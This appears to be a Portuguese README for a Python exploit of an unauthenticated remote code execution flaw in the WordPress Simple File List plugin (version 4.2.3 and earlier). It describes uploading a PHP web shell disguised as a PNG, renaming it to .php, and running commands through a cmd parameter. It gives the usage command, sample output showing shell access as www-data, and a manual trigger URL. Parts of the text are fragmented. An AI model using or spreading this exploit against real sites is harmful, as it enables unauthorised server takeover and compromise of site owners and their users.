
Simple File List – Exploit de RCE Não Autenticado (CVE-2025-34085)
⚠️ Código do Exploit por: Mrj Haxcore
Um exploit em Python totalmente funcional para o plugin Simple File List do WordPress (<= 4.2.3), que é vulnerável a execução remota de código (RCE) não autenticada devido a uma lógica insegura de upload e renomeação de arquivos.
simple-file-list).png, renomeá-lo para .php e executar código arbitrário.multipart/form-data (ignora erro 415).php, .php5, .phtml, etc.?cmd=�PNG)python3 simple.py https://target.site
[+] Uploading shell as 8dkls0qp.png...
[+] Upload successful.
[+] Trying to rename to: 8dkls0qp.php...
[+] Rename successful: 8dkls0qp.php
[+] Triggering shell: https://target.site/wp-content/uploads/simple-file-list/8dkls0qp.php?cmd=id
[+] Shell output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Visita Manual
https://target.site/wp-content/uploads/simple-file-list/8dkls0qp.php?cmd=whoami